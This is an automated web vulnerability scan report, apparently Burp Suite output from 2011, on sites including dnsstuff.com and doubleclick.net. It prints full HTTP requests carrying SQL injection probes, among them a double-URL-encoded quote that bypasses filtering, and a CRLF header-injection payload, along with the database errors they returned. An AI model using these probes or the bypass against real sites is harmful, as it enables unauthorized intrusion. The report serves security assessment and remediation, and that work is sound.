19.57. http://www.domaintools.com/learn/domain-valuation-how-to-value-a-domain-name-421/

19.58. http://www.domaintools.com/learn/help/

19.59. http://www.domaintools.com/learn/how-do-i-buy-a--domain-name-currently-owned-by-someone-else-422/

19.60. http://www.domaintools.com/learn/what-is-whois-information-and-why-is-it-valuable-419/

19.61. http://www.domaintools.com/monitor/

19.62. http://www.domaintools.com/monitor/domain-monitor/

19.63. http://www.domaintools.com/monitor/name-server-alert/

19.64. http://www.domaintools.com/monitor/registrant-alert/

19.65. http://www.domaintools.com/monitor/trademark-alert/

19.66. http://www.domaintools.com/research/

19.67. http://www.domaintools.com/research/dns/

19.68. http://www.domaintools.com/research/hosting-history/

19.69. http://www.domaintools.com/research/name-server-report/

19.70. http://www.domaintools.com/research/reverse-ip/

19.71. http://www.domaintools.com/research/reverse-whois/

19.72. http://www.domaintools.com/research/whois-applications/

19.73. http://www.domaintools.com/research/whois-history/

19.74. http://www.domaintools.com/sitemap/

19.75. http://www.verizonwireless.com/b2c/dispatcher

19.76. http://www.verizonwireless.com/b2c/explore/

19.77. http://www.verizonwireless.com/b2c/index.html

19.78. http://www.verizonwireless.com/b2c/shoppingAssistant

19.79. http://www.verizonwireless.com/b2c/store/controller

19.80. http://www.verizonwireless.com/b2c/store/controller

19.81. http://www.verizonwireless.com/b2c/store/controller

19.82. http://www.verizonwireless.com/b2c/store/controller

19.83. http://www.verizonwireless.com/b2c/storelocator/index.jsp

20. File upload functionality

21. TRACE method is enabled

21.1. http://apps.dnsstuff.com/

21.2. http://blog.domaintools.com/

21.3. http://dnsstuff.com/

21.4. http://picasaweb.google.com/

21.5. https://secure.domaintools.com/

21.6. http://support.domaintools.com/

21.7. http://www.dnsstuff.com/

21.8. https://www.dnsstuff.com/

22. Email addresses disclosed

22.1. http://blog.domaintools.com/

22.2. http://blog.domaintools.com/2011/06/fun-friday-win-these-domaintools-binoculars/

22.3. http://blog.domaintools.com/2011/07/you-asked-we-delivered-introducing-the-domaintools-api/

22.4. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl

22.5. http://dyn.com/

22.6. http://feed.domaintoolsblog.com/domaintools/

22.7. http://groups.google.com/groups

22.8. http://ibid4216487243.plumd.dnsstuff.com/style.css

22.9. http://images.bestbuy.com/BestBuy_US/store/js/jQuery/plugins/colorbox/colorbox/jquery.colorbox-min.js

22.10. http://jqueryui.com/about

22.11. http://phones.microsoftstore.com/eCommerce/SpecialOffer.aspx

22.12. https://secure.domaintools.com/log-in/

22.13. http://support.dnsstuff.com/KB/a27/how-to-enable-and-configure-internal-message-sniffer.aspx

22.14. http://support.dnsstuff.com/News/1/default-news-item.aspx

22.15. http://support.dnsstuff.com/News/root.aspx

22.16. http://www.dnsstuff.com/partner/dyn/

22.17. http://www.domaintools.com/

22.18. http://www.domaintools.com/composite/code.js

22.19. http://www.domaintools.com/composite/style.css

23. Private IP addresses disclosed

23.1. http://connect.facebook.net/en_US/all.js

23.2. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.3. http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/4M_1PP4LZN8.js

23.4. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/OxZAKD4r3bd.css

23.5. http://www.facebook.com/extern/login_status.php

23.6. http://www.facebook.com/plugins/like.php

24. Robots.txt file

24.1. https://adwords.google.com/um/StartNewLogin

24.2. http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

24.3. http://blog.domaintools.com/feed/

24.4. http://cbk0.google.com/

24.5. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl

24.6. http://clients1.google.com/generate_204

24.7. https://clients6.google.com/static/proxy.html

24.8. http://code.google.com/apis/maps/terms.html

24.9. http://dnsstuff.com/new-tools-a-upgrades

24.10. http://docs.google.com/

24.11. http://dyn.com/

24.12. http://feed.domaintoolsblog.com/domaintools/

24.13. http://feeds.bbci.co.uk/news/rss.xml

24.14. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

24.15. http://googleads.g.doubleclick.net/pagead/ads

24.16. http://groups.google.com/groups

24.17. http://gtssldv-crl.geotrust.com/crls/gtssldv.crl

24.18. http://ibid2252027210.peachd.dnsstuff.com/style.css

24.19. http://ibid2252027210.plumd.dnsstuff.com/style.css

24.20. http://jqueryui.com/about

24.21. http://khm0.google.com/kh/v/x3d88/x26

24.22. http://khm1.google.com/kh/v/x3d88/x26

24.23. http://khmdb0.google.com/kh

24.24. http://khmdb1.google.com/kh

24.25. http://mail.google.com/mail/

24.26. http://maps.google.com/maps

24.27. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

24.28. http://meyerweb.com/eric/tools/css/reset/

24.29. http://mobilebeta.microsoft.com/office/communicatormobile/java/download.aspx

24.30. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

24.31. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

24.32. http://pagead2.googlesyndication.com/pagead/show_ads.js

24.33. http://partner.domaining.com/link/

24.34. http://picasaweb.google.com/lh/view

24.35. https://plusone.google.com/u/0

24.36. http://safebrowsing.clients.google.com/safebrowsing/downloads

24.37. http://satuit.com/

24.38. https://secure.domaintools.com/log-in/

24.39. http://sites.google.com/

24.40. http://ssl.gstatic.com/gb/js/sem_d8da90aa15552b1b6c43db160e9dbc9c.js

24.41. https://ssl.gstatic.com/gb/js/gcm_b1be572aff2630578d6077ebe3f660a9.js

24.42. http://support.dnsstuff.com/AvatarHandler.ashx

24.43. http://support.domaintools.com/

24.44. http://translate.google.com/translate_t

24.45. http://webcache.googleusercontent.com/search

24.46. http://whois.domaintools.com/

24.47. http://www.dnsstuff.com/images/favicon.ico

24.48. https://www.dnsstuff.com/amember/login.php

24.49. http://www.dnswatch.info/

24.50. http://www.domaining.com/

24.51. http://www.domaintools.com/

24.52. http://www.dyn.com/

24.53. http://www.google-analytics.com/__utm.gif

25. Cacheable HTTPS response

25.1. https://clients6.google.com/static/proxy.html

25.2. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

26. HTML does not specify charset

26.1. http://cache.vzw.com/scripts/globalnav/blank.html

26.2. http://cgibin.erols.com/favicon.ico

26.3. http://ibid2252027210.peachd.dnsstuff.com/style.css

26.4. http://ibid2252027210.plumd.dnsstuff.com/style.css

26.5. http://ibid4216487243.plumd.dnsstuff.com/style.css

26.6. http://jqueryui.com/about

26.7. http://jqueryui.com/themeroller/

26.8. http://ocsp.entrust.net/

26.9. http://satuit.com/favicon.ico

26.10. http://switch.atdmt.com/iaction/bestbuy_page/v3/catName.Mobile%20Plans/catId.pcmcat203600050025/recognized.Anonymous/language.en/secChannel.0/skuList.9867653%2C9867644%2C9867608%2C9867592%2C9867574%2C9867486/catalyst_id.%5BCS%5Dv1|27121715051D30BA-40000107E02681AE%5BCE%5D/cache.49234257

26.11. http://www.verizonwireless.com/trophy/

27. HTML uses unrecognised charset

28. Content type incorrectly stated

28.1. http://cache.vzw.com/fonts/verizonApex-book-ex.woff

28.2. http://cache.vzw.com/globalnav/globalnavmenu.txt

28.3. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

28.4. http://ibid2252027210.peachd.dnsstuff.com/style.css

28.5. http://ibid2252027210.plumd.dnsstuff.com/style.css

28.6. http://ibid4216487243.plumd.dnsstuff.com/style.css

28.7. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

28.8. http://sales.liveperson.net/hcp/html/mTag.js

28.9. http://satuit.com/favicon.ico

28.10. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

28.11. http://wireless.amazon.com/alohaCartRequest

28.12. http://www.dnsstuff.com/bc-research-analysis

28.13. http://www.dnsstuff.com/bc-track-authenticate

28.14. http://www.dnsstuff.com/company

28.15. http://www.dnsstuff.com/company/about-us

28.16. http://www.dnsstuff.com/company/careers

28.17. http://www.dnsstuff.com/company/connect

28.18. http://www.dnsstuff.com/company/press-page

28.19. http://www.dnsstuff.com/company/support

28.20. http://www.dnsstuff.com/docs/lookup/

28.21. http://www.dnsstuff.com/docs/whois

28.22. http://www.dnsstuff.com/domaindoctor

28.23. http://www.dnsstuff.com/privacy-policy

28.24. http://www.dnsstuff.com/products

28.25. http://www.dnsstuff.com/products/alerts

28.26. http://www.dnsstuff.com/products/alerts/domaindoctor

28.27. http://www.dnsstuff.com/products/alerts/rblalert

28.28. http://www.dnsstuff.com/products/au

28.29. http://www.dnsstuff.com/products/dnsreport

28.30. http://www.dnsstuff.com/products/mstc

28.31. http://www.dnsstuff.com/products/overview

28.32. http://www.dnsstuff.com/products/protools

28.33. http://www.dnsstuff.com/products/resources

28.34. http://www.dnsstuff.com/products/resources/blog

28.35. http://www.dnsstuff.com/products/resources/news

28.36. http://www.dnsstuff.com/products/resources/resources

28.37. http://www.dnsstuff.com/products/resources/solution-briefs

28.38. http://www.dnsstuff.com/sitemap

28.39. http://www.dnsstuff.com/terms-of-use

28.40. http://www.dnsstuff.com/tools

28.41. http://www.dnsstuff.com/tools/

28.42. http://www.dnsstuff.com/tools/aboutyou/

28.43. http://www.dnsstuff.com/tools/tracert/

28.44. http://www.dnsstuff.com/tools/whois/

28.45. http://www.dnsstuff.com/trademarks

28.46. https://www.dnsstuff.com/amember/login.php

28.47. https://www.dnsstuff.com/amember/member.php

28.48. https://www.dnsstuff.com/amember/purchase.php

28.49. https://www.dnsstuff.com/amember/trial.php

28.50. https://www.dnsstuff.com/products/mstc

28.51. https://www.dnsstuff.com/products/protools

28.52. http://www.verizonwireless.com/b2c/devicesController/interface/dwrChangeTermService.js

28.53. http://www.verizonwireless.com/b2c/devicesController/interface/dwrCompareService.js

28.54. http://www.verizonwireless.com/b2c/devicesController/interface/dwrDeviceDetailTabService.js

28.55. http://www.verizonwireless.com/b2c/devicesController/interface/dwrSearchService.js

28.56. http://www.verizonwireless.com/b2c/devicesController/interface/dwrSupportTabService.js

29. Content type is not specified

29.1. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard

29.2. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard



1. SQL injection  next
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://googleads.g.doubleclick.net/pagead/ads [dt parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The dt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the dt request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783%2527&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:20:49 GMT
Server: cafe
Cache-Control: private
Content-Length: 5426
X-XSS-Protection: 1; mode=block

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783%2527%2527&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:20:51 GMT
Server: cafe
Cache-Control: private
Content-Length: 14221
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ifi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ifi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1'&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:52:24 GMT
Server: cafe
Cache-Control: private
Content-Length: 14183
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
va2VuPSZ0b29saGFuZGxlcl9yZWRpcmVjdD0wJmlwPTIwOS4yMzUuMTAuODSAAgGoAwHIAxc&num=2&sig=AOD64_03toXT7WfAAjyKK1dUd9HdHUgGOw&client=ca-pub-1026799836550757&adurl=http://info.arcsight.com/content/Google-FixThyErrors%3F_kk%3Dlog%2520analyzer%2520software%26_kt%3D78285438-606d-4d0e-9b34-ce1db027b29a" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1''&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:52:25 GMT
Server: cafe
Cache-Control: private
Content-Length: 13835
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.3. http://www.dnsstuff.com/l/ [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /l/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /l/?partner=dyn HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.2.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc; ID=f3d6c1ad003861

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:03:10 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 245
Content-Type: text/html; charset=utf-8

BAD CANT QUERY1064You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namo' at line 16

Request 2

GET /l/?partner=dyn HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.2.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc; ID=f3d6c1ad003861

Response 2

HTTP/1.1 302 Found
Date: Mon, 18 Jul 2011 02:03:11 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.dnsstuff.com/partner/dyn/
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html; charset=utf-8



1.4. http://www.dnsstuff.com/l/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dnsstuff.com
Path:   /l/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /l/?partner=dyn HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.2.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc; ID=f3d6c1ad003861

Response 1

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:03:07 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 218
Content-Type: text/html; charset=utf-8

BAD CANT QUERY1064You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'salmon.dnsstuff.com',
'dyn'
)' at line 17

Request 2

GET /l/?partner=dyn HTTP/1.1
Host: www.dnsstuff.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: PHPSESSIDNS=7c7o2iga9v72hufcgr89r5l7m6; __utma=114379858.362391004.1310954302.1310954302.1310954302.1; __utmb=114379858.2.10.1310954302; __utmc=114379858; __utmz=114379858.1310954302.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; guid=3b487ce412fcff47f2bec18ba8a3b5dc; ID=f3d6c1ad003861

Response 2

HTTP/1.1 302 Found
Date: Mon, 18 Jul 2011 02:03:08 GMT
Server: Apache/2.2.16 (Unix) DAV/2 mod_ssl/2.2.16 OpenSSL/0.9.8e
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.dnsstuff.com/partner/dyn/
Vary: Accept-Encoding
Content-Length: 1
Content-Type: text/html; charset=utf-8



2. HTTP header injection  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.bby.pcmcat203600050025/pcmcat203600050025

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 78e59%0d%0a406ba78a9fd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

